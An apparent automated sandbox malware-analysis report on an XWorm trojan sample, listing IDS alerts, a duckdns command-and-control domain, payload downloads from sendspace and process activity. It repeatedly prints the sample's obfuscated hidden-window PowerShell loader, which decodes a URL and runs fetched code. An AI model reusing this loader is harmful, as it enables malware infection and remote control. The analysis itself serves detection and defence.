              Source: TrafficSnort IDS: 2855924 ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound 192.168.2.4:49741 -> 12.202.180.134:8896
              Source: TrafficSnort IDS: 2852870 ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes 12.202.180.134:8896 -> 192.168.2.4:49741
              Source: TrafficSnort IDS: 2852874 ETPRO TROJAN Win32/XWorm CnC PING Command Inbound M2 12.202.180.134:8896 -> 192.168.2.4:49741
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorURLs: xgmn934.duckdns.org
              Uses dynamic DNS services
              Source: unknownDNS query: name: xgmn934.duckdns.org
              Source: global trafficTCP traffic: 192.168.2.4:49741 -> 12.202.180.134:8896
              Source: Joe Sandbox ViewIP Address: 69.31.136.17 69.31.136.17
              Source: Joe Sandbox ViewIP Address: 12.202.180.134 12.202.180.134
              Source: Joe Sandbox ViewIP Address: 172.67.170.105 172.67.170.105
              Source: Joe Sandbox ViewIP Address: 69.31.136.57 69.31.136.57
              Source: Joe Sandbox ViewASN Name: FISERV-INCUS FISERV-INCUS
              Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
              Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
              Source: global trafficHTTP traffic detected: GET /pro/dl/5m5a1u HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: www.sendspace.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /dlpro/3c9fc79de649f1492cc7b06003ebcaeb/664f936b/5m5a1u/Tyvstjlendes.pfb HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: fs13n3.sendspace.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /pro/dl/wyg3h5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: www.sendspace.comCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /dlpro/6e53a87522bbc42d52425dcdcc286e6c/664f939a/wyg3h5/SKAsvg71.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: fs03n3.sendspace.comConnection: Keep-AliveCookie: SID=mqp5phs8i4ibarpn7np6voj641
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /pro/dl/5m5a1u HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: www.sendspace.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /dlpro/3c9fc79de649f1492cc7b06003ebcaeb/664f936b/5m5a1u/Tyvstjlendes.pfb HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: fs13n3.sendspace.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /pro/dl/wyg3h5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: www.sendspace.comCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /dlpro/6e53a87522bbc42d52425dcdcc286e6c/664f939a/wyg3h5/SKAsvg71.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: fs03n3.sendspace.comConnection: Keep-AliveCookie: SID=mqp5phs8i4ibarpn7np6voj641
              Source: global trafficDNS traffic detected: DNS query: www.sendspace.com
              Source: global trafficDNS traffic detected: DNS query: fs13n3.sendspace.com
              Source: global trafficDNS traffic detected: DNS query: fs03n3.sendspace.com
              Source: global trafficDNS traffic detected: DNS query: xgmn934.duckdns.org
              Source: powershell.exe, 00000005.00000002.2184760858.00000000077FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
              Source: powershell.exe, 00000002.00000002.2441978527.000002045CC36000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fs13n3.sendspace.com
              Source: powershell.exe, 00000002.00000002.2611833386.000002046AEC5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2181785367.0000000005C5D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: powershell.exe, 00000005.00000002.2178140808.0000000004D4B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: powershell.exe, 00000002.00000002.2441978527.000002045AE51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2178140808.0000000004BF1000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.2921644464.0000000025F31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, 00000005.00000002.2178140808.0000000004D4B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: powershell.exe, 00000002.00000002.2441978527.000002045CBFE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sendspace.com
              Source: powershell.exe, 00000002.00000002.2441978527.000002045AE51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
              Source: powershell.exe, 00000005.00000002.2178140808.0000000004BF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
              Source: powershell.exe, 00000005.00000002.2181785367.0000000005C5D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 00000005.00000002.2181785367.0000000005C5D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 00000005.00000002.2181785367.0000000005C5D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
              Source: wab.exe, 0000000A.00000002.2907942536.000000000A56E000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2176975664.000000000A57F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fs03n3.sendspace.com/
              Source: wab.exe, 0000000A.00000002.2907942536.000000000A56E000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2176975664.000000000A57F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fs03n3.sendspace.com/I6
              Source: wab.exe, 0000000A.00000003.2151778284.000000000A57F000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2176975664.000000000A57F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fs03n3.sendspace.com/dlpro/6e53a87522bbc42d52425dcdcc286e6c/664f939a/wyg3h5/SKAsvg71.bin
              Source: wab.exe, 0000000A.00000003.2151778284.000000000A57F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fs03n3.sendspace.com/dlpro/6e53a87522bbc42d52425dcdcc286e6c/664f939a/wyg3h5/SKAsvg71.bin2d52
              Source: wab.exe, 0000000A.00000003.2176975664.000000000A57F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fs03n3.sendspace.com/dlpro/6e53a87522bbc42d52425dcdcc286e6c/664f939a/wyg3h5/SKAsvg71.bin8F4H
              Source: wab.exe, 0000000A.00000002.2907942536.000000000A56E000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2176975664.000000000A57F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fs03n3.sendspace.com/dlpro/6e53a87522bbc42d52425dcdcc286e6c/664f939a/wyg3h5/SKAsvg71.binP93
              Source: wab.exe, 0000000A.00000002.2907942536.000000000A56E000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2176975664.000000000A57F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fs03n3.sendspace.com/dlpro/6e53a87522bbc42d52425dcdcc286e6c/664f939a/wyg3h5/SKAsvg71.binj92
              Source: wab.exe, 0000000A.00000003.2176975664.000000000A57F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fs03n3.sendspace.com/dlpro/6e53a87522bbc42d52425dcdcc286e6c/664f939a/wyg3h5/SKAsvg71.binotBe
              Source: wab.exe, 0000000A.00000003.2176975664.000000000A57F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fs03n3.sendspace.com/m6
              Source: powershell.exe, 00000002.00000002.2441978527.000002045CC23000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fs13n3.sendspaX
              Source: powershell.exe, 00000002.00000002.2441978527.000002045CC23000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2441978527.000002045B2E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fs13n3.sendspace.com
              Source: powershell.exe, 00000002.00000002.2441978527.000002045B2E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2441978527.000002045CBFE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2441978527.000002045CC1F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2441978527.000002045CC23000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2441978527.000002045B2E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fs13n3.sendspace.com/dlpro/3c9fc79de649f1492cc7b06003ebcaeb/664f936b/5m5a1u/Tyvstjlendes.pfb
              Source: powershell.exe, 00000005.00000002.2178140808.0000000004D4B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
              Source: powershell.exe, 00000002.00000002.2441978527.000002045C0E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
              Source: powershell.exe, 00000002.00000002.2611833386.000002046AEC5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2181785367.0000000005C5D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
              Source: powershell.exe, 00000002.00000002.2441978527.000002045B07D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2441978527.000002045C713000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.sendspace.com
              Source: powershell.exe, 00000002.00000002.2441978527.000002045B07D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.sendspace.com/pro/dl/5m5a1uP
              Source: powershell.exe, 00000005.00000002.2178140808.0000000004D4B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.sendspace.com/pro/dl/5m5a1uXRul
              Source: wab.exe, 0000000A.00000002.2920474997.00000000255A0000.00000004.00001000.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.2907942536.000000000A552000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.sendspace.com/pro/dl/wyg3h5
              Source: wab.exe, 0000000A.00000003.2151778284.000000000A57F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.sendspace.com/pro/dl/wyg3h5j83
              Source: wab.exe, 0000000A.00000002.2907942536.000000000A552000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.sendspace.com/pro/dl/wyg3h5z
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
              Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
              Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
              Source: unknownHTTPS traffic detected: 172.67.170.105:443 -> 192.168.2.4:49730 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 69.31.136.57:443 -> 192.168.2.4:49731 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.170.105:443 -> 192.168.2.4:49738 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 69.31.136.17:443 -> 192.168.2.4:49739 version: TLS 1.2

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: amsi32_7744.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 7488, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 7744, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Very long command line found
              Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 6415
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 6439
              Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 6415Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 6439Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD9B8AAB162_2_00007FFD9B8AAB16
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD9B8AB8C22_2_00007FFD9B8AB8C2
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_04BBE9285_2_04BBE928
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_04BBF1F85_2_04BBF1F8
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_04BBE5E05_2_04BBE5E0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_0327EB9810_2_0327EB98
              Source: amsi32_7744.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 7488, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 7744, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: classification engineClassification label: mal100.troj.evad.winCMD@13/9@4/4
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Belejringstilstandenes.UnjJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeMutant created: NULL
              Source: C:\Program Files (x86)\Windows Mail\wab.exeMutant created: \Sessions\1\BaseNamedObjects\2utLZrxcByvppTdF
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7440:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7496:120:WilError_03
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_upabvupi.4vk.ps1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7488
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7744
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
              Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\zap.cmd" "
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Monostelous = 1;$Fomented='Sub';$Fomented+='strin';$Fomented+='g';Function Upstair91($Contrive){$Noontide=$Contrive.Length-$Monostelous;For($Bortskaffelsesmetode=5;$Bortskaffelsesmetode -lt $Noontide;$Bortskaffelsesmetode+=6){$Savnes+=$Contrive.$Fomented.Invoke( $Bortskaffelsesmetode, $Monostelous);}$Savnes;}function Skizoide($Cheanne){.($Scrimshorn) ($Cheanne);}$Lagenens=Upstair91 'automMSkvisoSamoazBi.eliNuclelMis ilSla,ea.vern/Vek.e5Unmag. Inf 0 Aaha Spade(UnrelW Im eiTatusnEk,pedTilkeoTrykkwIconos gumm vent.N VillTAtion Outse1 Efte0 Numm.,hoog0 Nabo;Skrot UkyndWcheiriP.ddenRokad6 Unde4Diara;Nanny Hus.exSelvg6Bikse4Konsu;Dagso Kor.fr Ego v Ripo:Helul1 lau2Overn1Perio. Hove0Genre) ,ugt ReplGRemnfeCor.ecPre,okNonvaoAfpas/Myste2Diaer0Lre r1Trich0Svanh0Pauci1condu0op.ak1,elss SemitF Oilsi,asserLu.thePriesf UoploLittex G.de/Snr l1 Caud2,hole1 .pre. Lobb0Savou ';$Unrevengingly166=Upstair91 'PeepiU Fl es,ndisePerv r Pins- Al,oAapprigSpadeeFil,nnGenavtNonfe ';$Stot=Upstair91 'ren rhBevistKedeltNiellpFortrsFotom:Selvh/ Acke/Bjergwfilbew.oncowBilla.Ov rss SisaeSamarnRefridE melsndvenpStimea Sangc Bukse Bes,.TempecCero,oPizzimMaste/BenaapKviltrstangofluff/AppoidProcelPrint/Va ut5Tet amCirku5OpspraReset1SolfauOp ys ';$Detonate=Upstair91 ',nthr>opbev ';$Scrimshorn=Upstair91 'Latkeis.igpe ballxKompr ';$Pelagia123='Tordnes';$Udpressede = Upstair91 'CirereTredic StaihSvrscoMetr. Filmm%Vildka A,phplill,pEstradR,misaPersptmanu.aInter%Bre,s\RestiBGenn,eEkseklVold eSoogejU,drarEdg,miFolkenSkorsgSt.nds PunctLope.iInduslbacitsHenhrtUnde.aKrgebn Bigfdfarvee .opon nomie KontsTyvep.SammeU Turbn Ta zjVeggi appli&R.dio&Udlov FikseDrypncUforuh CoinoAnde. Te,rt,fslu ';Skizoide (Upstair91 ' Ba d$Hon.rg Peril .outo GebrbSulfoa udsklSypho:kunneSRigsbk,interSynkats,emme M skr .ueleFlagegBiliniInform MoopeCinchnHovedtD trse SemitrneresLandi=Arbe,(Su,recReflemThinodTj.ne Medit/SpkhucTa.ul Amtsk$S adsUGrabbd HelspW,ener RenteDickysflorisS gareElderd EtlyeL,ane)maler ');Skizoide (Upstair91 'Ra,le$Sabelg ForslSloppo Ge sbKo.teaGrae,l Trac:spredBO.rejeTautnsIliadtRumvgrM risesam enStyrtdEftereCrowdsuropf=Vnget$Gr geSTvangtSm leoBan.stBlo.s.Poulis PhalpGrimrlD,visiDebittKamuf(Chest$L.cidDAdelseLydentMatteoCamern rackaSammetSiklie page) Redo ');$Stot=$Bestrendes[0];$songtress= (Upstair91 'Fri b$ StegglaanslLimitoStd ubInitiaGroenlAande: SkakS ,carpDundye MusocBi,tekVaretl FavoeCovendpayba= For,NSelvmeEnkepwLyrik-SekstO D,ukb.ommajTubuleExci.cOrigitBandl RouleSHj.teyRendes KlbetVaasee istimSecco.VirgiNoddf eforhit Jagg. oitfWTiltueShakeb RefrCProcelTerm,iJassieStrafnun.ott');$songtress+=$Skrteregimentets[1];Skizoide ($songtress);Skizoide (Upstair91 'Inca.$ stinSOvervpCarboephiltcA.sinkBo.bll.aveteKnackdEwder.PolisHHalvmeLe inaBije,dShik,e olyr Tagms Blg [Visc $ LudhUFhovenPy,pnrKole eRejsevZooloeephebnHomilgUd.kiiRe,hinme epgU.homlFodb,yBarog1Cepha6Wolfe6Ru,tp] Pen,=Hom g$Vol,mLCl,quaV
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Belejringstilstandenes.Unj && echo t"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Monostelous = 1;$Fomented='Sub';$Fomented+='strin';$Fomented+='g';Function Upstair91($Contrive){$Noontide=$Contrive.Length-$Monostelous;For($Bortskaffelsesmetode=5;$Bortskaffelsesmetode -lt $Noontide;$Bortskaffelsesmetode+=6){$Savnes+=$Contrive.$Fomented.Invoke( $Bortskaffelsesmetode, $Monostelous);}$Savnes;}function Skizoide($Cheanne){.($Scrimshorn) ($Cheanne);}$Lagenens=Upstair91 'automMSkvisoSamoazBi.eliNuclelMis ilSla,ea.vern/Vek.e5Unmag. Inf 0 Aaha Spade(UnrelW Im eiTatusnEk,pedTilkeoTrykkwIconos gumm vent.N VillTAtion Outse1 Efte0 Numm.,hoog0 Nabo;Skrot UkyndWcheiriP.ddenRokad6 Unde4Diara;Nanny Hus.exSelvg6Bikse4Konsu;Dagso Kor.fr Ego v Ripo:Helul1 lau2Overn1Perio. Hove0Genre) ,ugt ReplGRemnfeCor.ecPre,okNonvaoAfpas/Myste2Diaer0Lre r1Trich0Svanh0Pauci1condu0op.ak1,elss SemitF Oilsi,asserLu.thePriesf UoploLittex G.de/Snr l1 Caud2,hole1 .pre. Lobb0Savou ';$Unrevengingly166=Upstair91 'PeepiU Fl es,ndisePerv r Pins- Al,oAapprigSpadeeFil,nnGenavtNonfe ';$Stot=Upstair91 'ren rhBevistKedeltNiellpFortrsFotom:Selvh/ Acke/Bjergwfilbew.oncowBilla.Ov rss SisaeSamarnRefridE melsndvenpStimea Sangc Bukse Bes,.TempecCero,oPizzimMaste/BenaapKviltrstangofluff/AppoidProcelPrint/Va ut5Tet amCirku5OpspraReset1SolfauOp ys ';$Detonate=Upstair91 ',nthr>opbev ';$Scrimshorn=Upstair91 'Latkeis.igpe ballxKompr ';$Pelagia123='Tordnes';$Udpressede = Upstair91 'CirereTredic StaihSvrscoMetr. Filmm%Vildka A,phplill,pEstradR,misaPersptmanu.aInter%Bre,s\RestiBGenn,eEkseklVold eSoogejU,drarEdg,miFolkenSkorsgSt.nds PunctLope.iInduslbacitsHenhrtUnde.aKrgebn Bigfdfarvee .opon nomie KontsTyvep.SammeU Turbn Ta zjVeggi appli&R.dio&Udlov FikseDrypncUforuh CoinoAnde. Te,rt,fslu ';Skizoide (Upstair91 ' Ba d$Hon.rg Peril .outo GebrbSulfoa udsklSypho:kunneSRigsbk,interSynkats,emme M skr .ueleFlagegBiliniInform MoopeCinchnHovedtD trse SemitrneresLandi=Arbe,(Su,recReflemThinodTj.ne Medit/SpkhucTa.ul Amtsk$S adsUGrabbd HelspW,ener RenteDickysflorisS gareElderd EtlyeL,ane)maler ');Skizoide (Upstair91 'Ra,le$Sabelg ForslSloppo Ge sbKo.teaGrae,l Trac:spredBO.rejeTautnsIliadtRumvgrM risesam enStyrtdEftereCrowdsuropf=Vnget$Gr geSTvangtSm leoBan.stBlo.s.Poulis PhalpGrimrlD,visiDebittKamuf(Chest$L.cidDAdelseLydentMatteoCamern rackaSammetSiklie page) Redo ');$Stot=$Bestrendes[0];$songtress= (Upstair91 'Fri b$ StegglaanslLimitoStd ubInitiaGroenlAande: SkakS ,carpDundye MusocBi,tekVaretl FavoeCovendpayba= For,NSelvmeEnkepwLyrik-SekstO D,ukb.ommajTubuleExci.cOrigitBandl RouleSHj.teyRendes KlbetVaasee istimSecco.VirgiNoddf eforhit Jagg. oitfWTiltueShakeb RefrCProcelTerm,iJassieStrafnun.ott');$songtress+=$Skrteregimentets[1];Skizoide ($songtress);Skizoide (Upstair91 'Inca.$ stinSOvervpCarboephiltcA.sinkBo.bll.aveteKnackdEwder.PolisHHalvmeLe inaBije,dShik,e olyr Tagms Blg [Visc $ LudhUFhovenPy,pnrKole eRejsevZooloeephebnHomilgUd.kiiRe,hinme epgU.homlFodb,yBarog1Cepha6Wolfe6Ru,tp]
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Belejringstilstandenes.Unj && echo t"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Monostelous = 1;$Fomented='Sub';$Fomented+='strin';$Fomented+='g';Function Upstair91($Contrive){$Noontide=$Contrive.Length-$Monostelous;For($Bortskaffelsesmetode=5;$Bortskaffelsesmetode -lt $Noontide;$Bortskaffelsesmetode+=6){$Savnes+=$Contrive.$Fomented.Invoke( $Bortskaffelsesmetode, $Monostelous);}$Savnes;}function Skizoide($Cheanne){.($Scrimshorn) ($Cheanne);}$Lagenens=Upstair91 'automMSkvisoSamoazBi.eliNuclelMis ilSla,ea.vern/Vek.e5Unmag. Inf 0 Aaha Spade(UnrelW Im eiTatusnEk,pedTilkeoTrykkwIconos gumm vent.N VillTAtion Outse1 Efte0 Numm.,hoog0 Nabo;Skrot UkyndWcheiriP.ddenRokad6 Unde4Diara;Nanny Hus.exSelvg6Bikse4Konsu;Dagso Kor.fr Ego v Ripo:Helul1 lau2Overn1Perio. Hove0Genre) ,ugt ReplGRemnfeCor.ecPre,okNonvaoAfpas/Myste2Diaer0Lre r1Trich0Svanh0Pauci1condu0op.ak1,elss SemitF Oilsi,asserLu.thePriesf UoploLittex G.de/Snr l1 Caud2,hole1 .pre. Lobb0Savou ';$Unrevengingly166=Upstair91 'PeepiU Fl es,ndisePerv r Pins- Al,oAapprigSpadeeFil,nnGenavtNonfe ';$Stot=Upstair91 'ren rhBevistKedeltNiellpFortrsFotom:Selvh/ Acke/Bjergwfilbew.oncowBilla.Ov rss SisaeSamarnRefridE melsndvenpStimea Sangc Bukse Bes,.TempecCero,oPizzimMaste/BenaapKviltrstangofluff/AppoidProcelPrint/Va ut5Tet amCirku5OpspraReset1SolfauOp ys ';$Detonate=Upstair91 ',nthr>opbev ';$Scrimshorn=Upstair91 'Latkeis.igpe ballxKompr ';$Pelagia123='Tordnes';$Udpressede = Upstair91 'CirereTredic StaihSvrscoMetr. Filmm%Vildka A,phplill,pEstradR,misaPersptmanu.aInter%Bre,s\RestiBGenn,eEkseklVold eSoogejU,drarEdg,miFolkenSkorsgSt.nds PunctLope.iInduslbacitsHenhrtUnde.aKrgebn Bigfdfarvee .opon nomie KontsTyvep.SammeU Turbn Ta zjVeggi appli&R.dio&Udlov FikseDrypncUforuh CoinoAnde. Te,rt,fslu ';Skizoide (Upstair91 ' Ba d$Hon.rg Peril .outo GebrbSulfoa udsklSypho:kunneSRigsbk,interSynkats,emme M skr .ueleFlagegBiliniInform MoopeCinchnHovedtD trse SemitrneresLandi=Arbe,(Su,recReflemThinodTj.ne Medit/SpkhucTa.ul Amtsk$S adsUGrabbd HelspW,ener RenteDickysflorisS gareElderd EtlyeL,ane)maler ');Skizoide (Upstair91 'Ra,le$Sabelg ForslSloppo Ge sbKo.teaGrae,l Trac:spredBO.rejeTautnsIliadtRumvgrM risesam enStyrtdEftereCrowdsuropf=Vnget$Gr geSTvangtSm leoBan.stBlo.s.Poulis PhalpGrimrlD,visiDebittKamuf(Chest$L.cidDAdelseLydentMatteoCamern rackaSammetSiklie page) Redo ');$Stot=$Bestrendes[0];$songtress= (Upstair91 'Fri b$ StegglaanslLimitoStd ubInitiaGroenlAande: SkakS ,carpDundye MusocBi,tekVaretl FavoeCovendpayba= For,NSelvmeEnkepwLyrik-SekstO D,ukb.ommajTubuleExci.cOrigitBandl RouleSHj.teyRendes KlbetVaasee istimSecco.VirgiNoddf eforhit Jagg. oitfWTiltueShakeb RefrCProcelTerm,iJassieStrafnun.ott');$songtress+=$Skrteregimentets[1];Skizoide ($songtress);Skizoide (Upstair91 'Inca.$ stinSOvervpCarboephiltcA.sinkBo.bll.aveteKnackdEwder.PolisHHalvmeLe inaBije,dShik,e olyr Tagms Blg [Visc $ LudhUFhovenPy,pnrKole eRejsevZooloeephebnHomilgUd.kiiRe,hinme epgU.homlFodb,yBarog1Cepha6Wolfe6Ru,tp] Pen,=Hom g$Vol,mLCl,quaVJump to behavior
